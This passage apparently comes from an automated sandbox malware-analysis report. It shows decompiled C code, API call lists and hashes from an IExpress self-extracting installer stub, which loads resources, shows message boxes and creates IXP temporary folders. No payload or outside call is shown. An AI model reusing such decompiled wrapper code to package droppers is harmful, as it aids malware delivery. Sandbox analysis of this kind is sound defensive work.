                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            0x00324fe0
                                                                                                                                                                                                                                            0x00324fe6
                                                                                                                                                                                                                                            0x00324ff9
                                                                                                                                                                                                                                            0x0032500d
                                                                                                                                                                                                                                            0x00325013
                                                                                                                                                                                                                                            0x0032501a
                                                                                                                                                                                                                                            0x00325163
                                                                                                                                                                                                                                            0x00325163
                                                                                                                                                                                                                                            0x00325020
                                                                                                                                                                                                                                            0x00325027
                                                                                                                                                                                                                                            0x00325037
                                                                                                                                                                                                                                            0x00325051
                                                                                                                                                                                                                                            0x00325051
                                                                                                                                                                                                                                            0x00325057
                                                                                                                                                                                                                                            0x0032505e
                                                                                                                                                                                                                                            0x003250a7
                                                                                                                                                                                                                                            0x003250ad
                                                                                                                                                                                                                                            0x003250b4
                                                                                                                                                                                                                                            0x003250e8
                                                                                                                                                                                                                                            0x003250e8
                                                                                                                                                                                                                                            0x003250ee
                                                                                                                                                                                                                                            0x003250ff
                                                                                                                                                                                                                                            0x00325104
                                                                                                                                                                                                                                            0x00325106
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325106
                                                                                                                                                                                                                                            0x003250cd
                                                                                                                                                                                                                                            0x003250d3
                                                                                                                                                                                                                                            0x003250da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003250dd
                                                                                                                                                                                                                                            0x003250e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325060
                                                                                                                                                                                                                                            0x00325060
                                                                                                                                                                                                                                            0x00325070
                                                                                                                                                                                                                                            0x00325075
                                                                                                                                                                                                                                            0x00325107
                                                                                                                                                                                                                                            0x00325107
                                                                                                                                                                                                                                            0x0032510e
                                                                                                                                                                                                                                            0x00325111
                                                                                                                                                                                                                                            0x00325117
                                                                                                                                                                                                                                            0x00325117
                                                                                                                                                                                                                                            0x0032511f
                                                                                                                                                                                                                                            0x00325121
                                                                                                                                                                                                                                            0x00325127
                                                                                                                                                                                                                                            0x00325135
                                                                                                                                                                                                                                            0x00325135
                                                                                                                                                                                                                                            0x00325127
                                                                                                                                                                                                                                            0x00325141
                                                                                                                                                                                                                                            0x00325159
                                                                                                                                                                                                                                            0x00325159
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032515f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00324FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00325006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0032500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00325030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00325037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 0032504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00325051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00325111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00325159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: 7f6ade2d9d7eee039643b1d34de7e8cb812712be670611c99dd64070ab2aa573
                                                                                                                                                                                                                                            • Instruction ID: ee410e7499f1188566c289147d8ade89192a0eb16fcc65c12cb5c0e75be7d07b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f6ade2d9d7eee039643b1d34de7e8cb812712be670611c99dd64070ab2aa573
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA3109B0740735BFEB335B62BD8AF67369CB704B55F05441DFD01A21E1DAB4AC528A60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 3244b9-3244f8 407 324679-32467b 406->407 408 3244fe-324525 LoadStringA 406->408 411 32467c-32468c call 326ce0 407->411 409 324562-324568 408->409 410 324527-32452e call 32681f 408->410 412 32456b-324570 409->412 420 324530-32453d call 3267c9 410->420 421 32453f 410->421 412->412 415 324572-32457c 412->415 418 3245c9-3245cb 415->418 419 32457e-324580 415->419 424 324607-324617 LocalAlloc 418->424 425 3245cd-3245cf 418->425 422 324583-324588 419->422 420->421 426 324544-324554 MessageBoxA 420->426 421->426 422->422 429 32458a-32458c 422->429 427 32455a-32455d 424->427 428 32461d-324628 call 321680 424->428 431 3245d2-3245d7 425->431 426->427 427->411 435 32462d-32463d MessageBeep call 32681f 428->435 433 32458f-324594 429->433 431->431 434 3245d9-3245ed LocalAlloc 431->434 433->433 436 324596-3245ad LocalAlloc 433->436 434->427 437 3245f3-324605 call 32171e 434->437 444 32464e 435->444 445 32463f-32464c call 3267c9 435->445 436->427 439 3245af-3245c7 call 32171e 436->439 437->435 439->435 448 324653-324677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E003244B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0x328a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x329a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00321680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E0032171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E0032171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E0032681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E003267C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E0032681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E003267C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x003244b9
                                                                                                                                                                                                                                            0x003244c4
                                                                                                                                                                                                                                            0x003244cb
                                                                                                                                                                                                                                            0x003244d8
                                                                                                                                                                                                                                            0x003244e4
                                                                                                                                                                                                                                            0x003244eb
                                                                                                                                                                                                                                            0x003244ee
                                                                                                                                                                                                                                            0x003244ef
                                                                                                                                                                                                                                            0x003244ef
                                                                                                                                                                                                                                            0x003244f1
                                                                                                                                                                                                                                            0x003244f7
                                                                                                                                                                                                                                            0x003244f8
                                                                                                                                                                                                                                            0x0032467b
                                                                                                                                                                                                                                            0x003244fe
                                                                                                                                                                                                                                            0x00324509
                                                                                                                                                                                                                                            0x00324518
                                                                                                                                                                                                                                            0x00324525
                                                                                                                                                                                                                                            0x00324562
                                                                                                                                                                                                                                            0x00324568
                                                                                                                                                                                                                                            0x00324568
                                                                                                                                                                                                                                            0x0032456b
                                                                                                                                                                                                                                            0x0032456b
                                                                                                                                                                                                                                            0x0032456d
                                                                                                                                                                                                                                            0x0032456e
                                                                                                                                                                                                                                            0x00324572
                                                                                                                                                                                                                                            0x00324578
                                                                                                                                                                                                                                            0x0032457c
                                                                                                                                                                                                                                            0x003245cb
                                                                                                                                                                                                                                            0x00324607
                                                                                                                                                                                                                                            0x00324607
                                                                                                                                                                                                                                            0x0032460d
                                                                                                                                                                                                                                            0x00324613
                                                                                                                                                                                                                                            0x00324617
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032461d
                                                                                                                                                                                                                                            0x00324623
                                                                                                                                                                                                                                            0x00324626
                                                                                                                                                                                                                                            0x00324628
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324628
                                                                                                                                                                                                                                            0x003245cd
                                                                                                                                                                                                                                            0x003245cd
                                                                                                                                                                                                                                            0x003245cf
                                                                                                                                                                                                                                            0x003245cf
                                                                                                                                                                                                                                            0x003245d2
                                                                                                                                                                                                                                            0x003245d2
                                                                                                                                                                                                                                            0x003245d4
                                                                                                                                                                                                                                            0x003245d5
                                                                                                                                                                                                                                            0x003245db
                                                                                                                                                                                                                                            0x003245de
                                                                                                                                                                                                                                            0x003245e3
                                                                                                                                                                                                                                            0x003245e9
                                                                                                                                                                                                                                            0x003245ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003245f3
                                                                                                                                                                                                                                            0x003245fd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324602
                                                                                                                                                                                                                                            0x003245ed
                                                                                                                                                                                                                                            0x0032457e
                                                                                                                                                                                                                                            0x0032457e
                                                                                                                                                                                                                                            0x00324580
                                                                                                                                                                                                                                            0x00324580
                                                                                                                                                                                                                                            0x00324583
                                                                                                                                                                                                                                            0x00324583
                                                                                                                                                                                                                                            0x00324585
                                                                                                                                                                                                                                            0x00324586
                                                                                                                                                                                                                                            0x0032458a
                                                                                                                                                                                                                                            0x0032458c
                                                                                                                                                                                                                                            0x0032458f
                                                                                                                                                                                                                                            0x0032458f
                                                                                                                                                                                                                                            0x00324591
                                                                                                                                                                                                                                            0x00324592
                                                                                                                                                                                                                                            0x0032459b
                                                                                                                                                                                                                                            0x0032459e
                                                                                                                                                                                                                                            0x003245a3
                                                                                                                                                                                                                                            0x003245a9
                                                                                                                                                                                                                                            0x003245ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003245af
                                                                                                                                                                                                                                            0x003245af
                                                                                                                                                                                                                                            0x003245bf
                                                                                                                                                                                                                                            0x0032462d
                                                                                                                                                                                                                                            0x00324630
                                                                                                                                                                                                                                            0x0032463d
                                                                                                                                                                                                                                            0x0032464e
                                                                                                                                                                                                                                            0x0032464e
                                                                                                                                                                                                                                            0x0032463f
                                                                                                                                                                                                                                            0x00324640
                                                                                                                                                                                                                                            0x00324647
                                                                                                                                                                                                                                            0x0032464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032464c
                                                                                                                                                                                                                                            0x00324666
                                                                                                                                                                                                                                            0x0032466d
                                                                                                                                                                                                                                            0x0032466f
                                                                                                                                                                                                                                            0x00324675
                                                                                                                                                                                                                                            0x00324675
                                                                                                                                                                                                                                            0x003245ad
                                                                                                                                                                                                                                            0x00324527
                                                                                                                                                                                                                                            0x0032452e
                                                                                                                                                                                                                                            0x0032453f
                                                                                                                                                                                                                                            0x0032453f
                                                                                                                                                                                                                                            0x00324530
                                                                                                                                                                                                                                            0x00324531
                                                                                                                                                                                                                                            0x00324538
                                                                                                                                                                                                                                            0x0032453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032453d
                                                                                                                                                                                                                                            0x00324554
                                                                                                                                                                                                                                            0x0032455a
                                                                                                                                                                                                                                            0x0032455a
                                                                                                                                                                                                                                            0x0032455a
                                                                                                                                                                                                                                            0x00324525
                                                                                                                                                                                                                                            0x0032468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 003245A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 003245E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 0032460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00324630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00324666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0032466F
                                                                                                                                                                                                                                              • Part of subcall function 0032681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0032686E
                                                                                                                                                                                                                                              • Part of subcall function 0032681F: GetSystemMetrics.USER32(0000004A), ref: 003268A7
                                                                                                                                                                                                                                              • Part of subcall function 0032681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003268CC
                                                                                                                                                                                                                                              • Part of subcall function 0032681F: RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,?,0000000C), ref: 003268F4
                                                                                                                                                                                                                                              • Part of subcall function 0032681F: RegCloseKey.ADVAPI32(?), ref: 00326902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                                                            • API String ID: 3244514340-2605220145
                                                                                                                                                                                                                                            • Opcode ID: 393d06040021427250f94c9209d9c08ac61022768ebdccb2881967c5dc3d7c88
                                                                                                                                                                                                                                            • Instruction ID: 9edb80bbdf1dddbd9859834758b004b518a32e3d601b83d32bc4c19556c3cb8c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 393d06040021427250f94c9209d9c08ac61022768ebdccb2881967c5dc3d7c88
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A512871900225AFDB239F28EC48BAA7B69EF46300F114199FD49A7241DB71DD0ACB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E003253A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E0032171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E00321680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E0032658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E00326CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0x328a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x003253ac
                                                                                                                                                                                                                                            0x003253b3
                                                                                                                                                                                                                                            0x003253b9
                                                                                                                                                                                                                                            0x003253bb
                                                                                                                                                                                                                                            0x003253bd
                                                                                                                                                                                                                                            0x003253bf
                                                                                                                                                                                                                                            0x003253d1
                                                                                                                                                                                                                                            0x003253d6
                                                                                                                                                                                                                                            0x003253e0
                                                                                                                                                                                                                                            0x003253e2
                                                                                                                                                                                                                                            0x003253f5
                                                                                                                                                                                                                                            0x003253fb
                                                                                                                                                                                                                                            0x00325402
                                                                                                                                                                                                                                            0x0032540b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325413
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325415
                                                                                                                                                                                                                                            0x00325416
                                                                                                                                                                                                                                            0x00325427
                                                                                                                                                                                                                                            0x0032542a
                                                                                                                                                                                                                                            0x0032542b
                                                                                                                                                                                                                                            0x00325434
                                                                                                                                                                                                                                            0x00325434
                                                                                                                                                                                                                                            0x0032543a
                                                                                                                                                                                                                                            0x0032544c
                                                                                                                                                                                                                                            0x0032544c
                                                                                                                                                                                                                                            0x00325452
                                                                                                                                                                                                                                            0x0032545a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032545e
                                                                                                                                                                                                                                            0x0032545f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032171E: _vsnprintf.MSVCRT ref: 00321750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003253FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032541F
